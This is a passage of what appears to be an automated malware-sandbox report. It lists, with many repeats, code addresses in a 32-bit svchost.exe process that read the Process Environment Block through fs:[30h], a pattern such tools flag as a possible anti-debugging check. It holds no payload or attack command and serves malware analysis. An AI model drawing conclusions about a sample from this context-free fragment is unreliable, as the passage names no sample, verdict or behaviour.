            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436074 mov eax, dword ptr fs:[00000030h]1_2_03436074
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436074 mov eax, dword ptr fs:[00000030h]1_2_03436074
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438009 mov eax, dword ptr fs:[00000030h]1_2_03438009
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472010 mov ecx, dword ptr fs:[00000030h]1_2_03472010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC0E0 mov ecx, dword ptr fs:[00000030h]1_2_034BC0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C0F6 mov eax, dword ptr fs:[00000030h]1_2_0342C0F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504080 mov eax, dword ptr fs:[00000030h]1_2_03504080
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504080 mov eax, dword ptr fs:[00000030h]1_2_03504080
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504080 mov eax, dword ptr fs:[00000030h]1_2_03504080
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504080 mov eax, dword ptr fs:[00000030h]1_2_03504080
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504080 mov eax, dword ptr fs:[00000030h]1_2_03504080
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504080 mov eax, dword ptr fs:[00000030h]1_2_03504080
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504080 mov eax, dword ptr fs:[00000030h]1_2_03504080
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A093 mov ecx, dword ptr fs:[00000030h]1_2_0342A093
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C090 mov eax, dword ptr fs:[00000030h]1_2_0342C090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6090 mov eax, dword ptr fs:[00000030h]1_2_034C6090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034700A5 mov eax, dword ptr fs:[00000030h]1_2_034700A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B60A0 mov eax, dword ptr fs:[00000030h]1_2_034B60A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B60A0 mov eax, dword ptr fs:[00000030h]1_2_034B60A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B60A0 mov eax, dword ptr fs:[00000030h]1_2_034B60A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B60A0 mov eax, dword ptr fs:[00000030h]1_2_034B60A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B60A0 mov eax, dword ptr fs:[00000030h]1_2_034B60A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B60A0 mov eax, dword ptr fs:[00000030h]1_2_034B60A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B60A0 mov eax, dword ptr fs:[00000030h]1_2_034B60A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452755 mov eax, dword ptr fs:[00000030h]1_2_03452755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452755 mov eax, dword ptr fs:[00000030h]1_2_03452755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452755 mov eax, dword ptr fs:[00000030h]1_2_03452755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452755 mov ecx, dword ptr fs:[00000030h]1_2_03452755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452755 mov eax, dword ptr fs:[00000030h]1_2_03452755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452755 mov eax, dword ptr fs:[00000030h]1_2_03452755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A750 mov eax, dword ptr fs:[00000030h]1_2_0346A750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE750 mov eax, dword ptr fs:[00000030h]1_2_034DE750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03442760 mov ecx, dword ptr fs:[00000030h]1_2_03442760
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460774 mov eax, dword ptr fs:[00000030h]1_2_03460774
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434779 mov eax, dword ptr fs:[00000030h]1_2_03434779
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434779 mov eax, dword ptr fs:[00000030h]1_2_03434779
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345270D mov eax, dword ptr fs:[00000030h]1_2_0345270D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345270D mov eax, dword ptr fs:[00000030h]1_2_0345270D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345270D mov eax, dword ptr fs:[00000030h]1_2_0345270D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343471B mov eax, dword ptr fs:[00000030h]1_2_0343471B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343471B mov eax, dword ptr fs:[00000030h]1_2_0343471B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E7E0 mov eax, dword ptr fs:[00000030h]1_2_0345E7E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE79D mov eax, dword ptr fs:[00000030h]1_2_034AE79D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE79D mov eax, dword ptr fs:[00000030h]1_2_034AE79D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE79D mov eax, dword ptr fs:[00000030h]1_2_034AE79D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE79D mov eax, dword ptr fs:[00000030h]1_2_034AE79D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE79D mov eax, dword ptr fs:[00000030h]1_2_034AE79D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE79D mov eax, dword ptr fs:[00000030h]1_2_034AE79D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE79D mov eax, dword ptr fs:[00000030h]1_2_034AE79D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE79D mov eax, dword ptr fs:[00000030h]1_2_034AE79D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE79D mov eax, dword ptr fs:[00000030h]1_2_034AE79D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034307A7 mov eax, dword ptr fs:[00000030h]1_2_034307A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D47B4 mov eax, dword ptr fs:[00000030h]1_2_034D47B4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D47B4 mov eax, dword ptr fs:[00000030h]1_2_034D47B4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D47B4 mov eax, dword ptr fs:[00000030h]1_2_034D47B4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D47B4 mov eax, dword ptr fs:[00000030h]1_2_034D47B4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D47B4 mov eax, dword ptr fs:[00000030h]1_2_034D47B4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D47B4 mov eax, dword ptr fs:[00000030h]1_2_034D47B4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D47B4 mov ecx, dword ptr fs:[00000030h]1_2_034D47B4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034CC7B0 mov eax, dword ptr fs:[00000030h]1_2_034CC7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034CC7B0 mov eax, dword ptr fs:[00000030h]1_2_034CC7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C640 mov eax, dword ptr fs:[00000030h]1_2_0346C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C640 mov eax, dword ptr fs:[00000030h]1_2_0346C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346265C mov eax, dword ptr fs:[00000030h]1_2_0346265C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346265C mov ecx, dword ptr fs:[00000030h]1_2_0346265C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346265C mov eax, dword ptr fs:[00000030h]1_2_0346265C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346666D mov esi, dword ptr fs:[00000030h]1_2_0346666D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346666D mov eax, dword ptr fs:[00000030h]1_2_0346666D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346666D mov eax, dword ptr fs:[00000030h]1_2_0346666D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE660 mov eax, dword ptr fs:[00000030h]1_2_034BE660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430670 mov eax, dword ptr fs:[00000030h]1_2_03430670
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472670 mov eax, dword ptr fs:[00000030h]1_2_03472670
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472670 mov eax, dword ptr fs:[00000030h]1_2_03472670
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504600 mov eax, dword ptr fs:[00000030h]1_2_03504600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C620 mov eax, dword ptr fs:[00000030h]1_2_0346C620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430630 mov eax, dword ptr fs:[00000030h]1_2_03430630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460630 mov eax, dword ptr fs:[00000030h]1_2_03460630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B8633 mov esi, dword ptr fs:[00000030h]1_2_034B8633
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B8633 mov eax, dword ptr fs:[00000030h]1_2_034B8633
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B8633 mov eax, dword ptr fs:[00000030h]1_2_034B8633
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034306CF mov eax, dword ptr fs:[00000030h]1_2_034306CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FA6C0 mov eax, dword ptr fs:[00000030h]1_2_034FA6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D86C2 mov eax, dword ptr fs:[00000030h]1_2_034D86C2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C66D0 mov eax, dword ptr fs:[00000030h]1_2_034C66D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C66D0 mov eax, dword ptr fs:[00000030h]1_2_034C66D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE6D0 mov eax, dword ptr fs:[00000030h]1_2_034DE6D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343C6E0 mov eax, dword ptr fs:[00000030h]1_2_0343C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034566E0 mov eax, dword ptr fs:[00000030h]1_2_034566E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034566E0 mov eax, dword ptr fs:[00000030h]1_2_034566E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AC6F2 mov eax, dword ptr fs:[00000030h]1_2_034AC6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AC6F2 mov eax, dword ptr fs:[00000030h]1_2_034AC6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440680 mov eax, dword ptr fs:[00000030h]1_2_03440680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440680 mov eax, dword ptr fs:[00000030h]1_2_03440680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440680 mov eax, dword ptr fs:[00000030h]1_2_03440680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440680 mov eax, dword ptr fs:[00000030h]1_2_03440680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440680 mov eax, dword ptr fs:[00000030h]1_2_03440680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440680 mov eax, dword ptr fs:[00000030h]1_2_03440680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440680 mov eax, dword ptr fs:[00000030h]1_2_03440680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440680 mov eax, dword ptr fs:[00000030h]1_2_03440680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440680 mov eax, dword ptr fs:[00000030h]1_2_03440680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440680 mov eax, dword ptr fs:[00000030h]1_2_03440680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440680 mov eax, dword ptr fs:[00000030h]1_2_03440680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440680 mov eax, dword ptr fs:[00000030h]1_2_03440680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438690 mov eax, dword ptr fs:[00000030h]1_2_03438690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC691 mov eax, dword ptr fs:[00000030h]1_2_034BC691
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F86A8 mov eax, dword ptr fs:[00000030h]1_2_034F86A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F86A8 mov eax, dword ptr fs:[00000030h]1_2_034F86A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E547 mov eax, dword ptr fs:[00000030h]1_2_0344E547
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03466540 mov eax, dword ptr fs:[00000030h]1_2_03466540
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03468540 mov eax, dword ptr fs:[00000030h]1_2_03468540
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343254C mov eax, dword ptr fs:[00000030h]1_2_0343254C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6550 mov eax, dword ptr fs:[00000030h]1_2_034C6550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FA553 mov eax, dword ptr fs:[00000030h]1_2_034FA553
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344C560 mov eax, dword ptr fs:[00000030h]1_2_0344C560
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E507 mov eax, dword ptr fs:[00000030h]1_2_0345E507
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E507 mov eax, dword ptr fs:[00000030h]1_2_0345E507
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E507 mov eax, dword ptr fs:[00000030h]1_2_0345E507
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E507 mov eax, dword ptr fs:[00000030h]1_2_0345E507
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E507 mov eax, dword ptr fs:[00000030h]1_2_0345E507
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E507 mov eax, dword ptr fs:[00000030h]1_2_0345E507
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E507 mov eax, dword ptr fs:[00000030h]1_2_0345E507
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E507 mov eax, dword ptr fs:[00000030h]1_2_0345E507
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03432500 mov eax, dword ptr fs:[00000030h]1_2_03432500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C50D mov eax, dword ptr fs:[00000030h]1_2_0346C50D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C50D mov eax, dword ptr fs:[00000030h]1_2_0346C50D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC51D mov eax, dword ptr fs:[00000030h]1_2_034BC51D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344252B mov eax, dword ptr fs:[00000030h]1_2_0344252B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344252B mov eax, dword ptr fs:[00000030h]1_2_0344252B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344252B mov eax, dword ptr fs:[00000030h]1_2_0344252B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344252B mov eax, dword ptr fs:[00000030h]1_2_0344252B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344252B mov eax, dword ptr fs:[00000030h]1_2_0344252B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344252B mov eax, dword ptr fs:[00000030h]1_2_0344252B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344252B mov eax, dword ptr fs:[00000030h]1_2_0344252B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472539 mov eax, dword ptr fs:[00000030h]1_2_03472539
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C5C6 mov eax, dword ptr fs:[00000030h]1_2_0346C5C6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B05C6 mov eax, dword ptr fs:[00000030h]1_2_034B05C6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034665D0 mov eax, dword ptr fs:[00000030h]1_2_034665D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A5E7 mov ebx, dword ptr fs:[00000030h]1_2_0346A5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A5E7 mov eax, dword ptr fs:[00000030h]1_2_0346A5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE5E0 mov eax, dword ptr fs:[00000030h]1_2_034DE5E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC5FC mov eax, dword ptr fs:[00000030h]1_2_034BC5FC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE588 mov eax, dword ptr fs:[00000030h]1_2_034AE588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE588 mov eax, dword ptr fs:[00000030h]1_2_034AE588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A580 mov eax, dword ptr fs:[00000030h]1_2_0346A580
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A580 mov eax, dword ptr fs:[00000030h]1_2_0346A580
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03462594 mov eax, dword ptr fs:[00000030h]1_2_03462594
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC592 mov eax, dword ptr fs:[00000030h]1_2_034BC592
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B85AA mov eax, dword ptr fs:[00000030h]1_2_034B85AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034345B0 mov eax, dword ptr fs:[00000030h]1_2_034345B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034345B0 mov eax, dword ptr fs:[00000030h]1_2_034345B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440445 mov eax, dword ptr fs:[00000030h]1_2_03440445
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440445 mov eax, dword ptr fs:[00000030h]1_2_03440445
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440445 mov eax, dword ptr fs:[00000030h]1_2_03440445
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440445 mov eax, dword ptr fs:[00000030h]1_2_03440445
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440445 mov eax, dword ptr fs:[00000030h]1_2_03440445
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440445 mov eax, dword ptr fs:[00000030h]1_2_03440445
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0443 mov eax, dword ptr fs:[00000030h]1_2_034B0443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E45E mov eax, dword ptr fs:[00000030h]1_2_0345E45E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E45E mov eax, dword ptr fs:[00000030h]1_2_0345E45E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E45E mov eax, dword ptr fs:[00000030h]1_2_0345E45E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E45E mov eax, dword ptr fs:[00000030h]1_2_0345E45E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E45E mov eax, dword ptr fs:[00000030h]1_2_0345E45E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE461 mov eax, dword ptr fs:[00000030h]1_2_034BE461
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FA464 mov eax, dword ptr fs:[00000030h]1_2_034FA464
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438470 mov eax, dword ptr fs:[00000030h]1_2_03438470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438470 mov eax, dword ptr fs:[00000030h]1_2_03438470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6400 mov eax, dword ptr fs:[00000030h]1_2_034C6400
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6400 mov eax, dword ptr fs:[00000030h]1_2_034C6400
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342640D mov eax, dword ptr fs:[00000030h]1_2_0342640D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034544D1 mov eax, dword ptr fs:[00000030h]1_2_034544D1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034544D1 mov eax, dword ptr fs:[00000030h]1_2_034544D1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E4EF mov eax, dword ptr fs:[00000030h]1_2_0346E4EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E4EF mov eax, dword ptr fs:[00000030h]1_2_0346E4EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034364F0 mov eax, dword ptr fs:[00000030h]1_2_034364F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D44F8 mov eax, dword ptr fs:[00000030h]1_2_034D44F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D44F8 mov eax, dword ptr fs:[00000030h]1_2_034D44F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A4F0 mov eax, dword ptr fs:[00000030h]1_2_0346A4F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A4F0 mov eax, dword ptr fs:[00000030h]1_2_0346A4F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE4F2 mov eax, dword ptr fs:[00000030h]1_2_034BE4F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE4F2 mov eax, dword ptr fs:[00000030h]1_2_034BE4F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430485 mov ecx, dword ptr fs:[00000030h]1_2_03430485
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346648A mov eax, dword ptr fs:[00000030h]1_2_0346648A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346648A mov eax, dword ptr fs:[00000030h]1_2_0346648A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346648A mov eax, dword ptr fs:[00000030h]1_2_0346648A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC490 mov eax, dword ptr fs:[00000030h]1_2_034BC490
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034324A2 mov eax, dword ptr fs:[00000030h]1_2_034324A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034324A2 mov ecx, dword ptr fs:[00000030h]1_2_034324A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034644A8 mov eax, dword ptr fs:[00000030h]1_2_034644A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C84BB mov eax, dword ptr fs:[00000030h]1_2_034C84BB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E4BC mov eax, dword ptr fs:[00000030h]1_2_0346E4BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343AB70 mov eax, dword ptr fs:[00000030h]1_2_0343AB70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343AB70 mov eax, dword ptr fs:[00000030h]1_2_0343AB70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343AB70 mov eax, dword ptr fs:[00000030h]1_2_0343AB70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343AB70 mov eax, dword ptr fs:[00000030h]1_2_0343AB70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343AB70 mov eax, dword ptr fs:[00000030h]1_2_0343AB70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343AB70 mov eax, dword ptr fs:[00000030h]1_2_0343AB70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436B70 mov eax, dword ptr fs:[00000030h]1_2_03436B70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436B70 mov eax, dword ptr fs:[00000030h]1_2_03436B70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436B70 mov eax, dword ptr fs:[00000030h]1_2_03436B70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504B67 mov eax, dword ptr fs:[00000030h]1_2_03504B67
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E6B77 mov eax, dword ptr fs:[00000030h]1_2_034E6B77
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03464B79 mov eax, dword ptr fs:[00000030h]1_2_03464B79
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438B10 mov eax, dword ptr fs:[00000030h]1_2_03438B10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438B10 mov eax, dword ptr fs:[00000030h]1_2_03438B10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438B10 mov eax, dword ptr fs:[00000030h]1_2_03438B10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440B10 mov eax, dword ptr fs:[00000030h]1_2_03440B10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440B10 mov eax, dword ptr fs:[00000030h]1_2_03440B10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440B10 mov eax, dword ptr fs:[00000030h]1_2_03440B10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440B10 mov eax, dword ptr fs:[00000030h]1_2_03440B10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EB1C mov eax, dword ptr fs:[00000030h]1_2_0345EB1C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342CB1E mov eax, dword ptr fs:[00000030h]1_2_0342CB1E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346CB20 mov eax, dword ptr fs:[00000030h]1_2_0346CB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BCB20 mov eax, dword ptr fs:[00000030h]1_2_034BCB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BCB20 mov eax, dword ptr fs:[00000030h]1_2_034BCB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BCB20 mov eax, dword ptr fs:[00000030h]1_2_034BCB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342EBC0 mov eax, dword ptr fs:[00000030h]1_2_0342EBC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4BC0 mov eax, dword ptr fs:[00000030h]1_2_034B4BC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4BC0 mov eax, dword ptr fs:[00000030h]1_2_034B4BC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4BC0 mov eax, dword ptr fs:[00000030h]1_2_034B4BC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4BC0 mov eax, dword ptr fs:[00000030h]1_2_034B4BC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D6BDE mov ebx, dword ptr fs:[00000030h]1_2_034D6BDE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D6BDE mov eax, dword ptr fs:[00000030h]1_2_034D6BDE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03458BD1 mov eax, dword ptr fs:[00000030h]1_2_03458BD1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03458BD1 mov eax, dword ptr fs:[00000030h]1_2_03458BD1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504BE0 mov eax, dword ptr fs:[00000030h]1_2_03504BE0
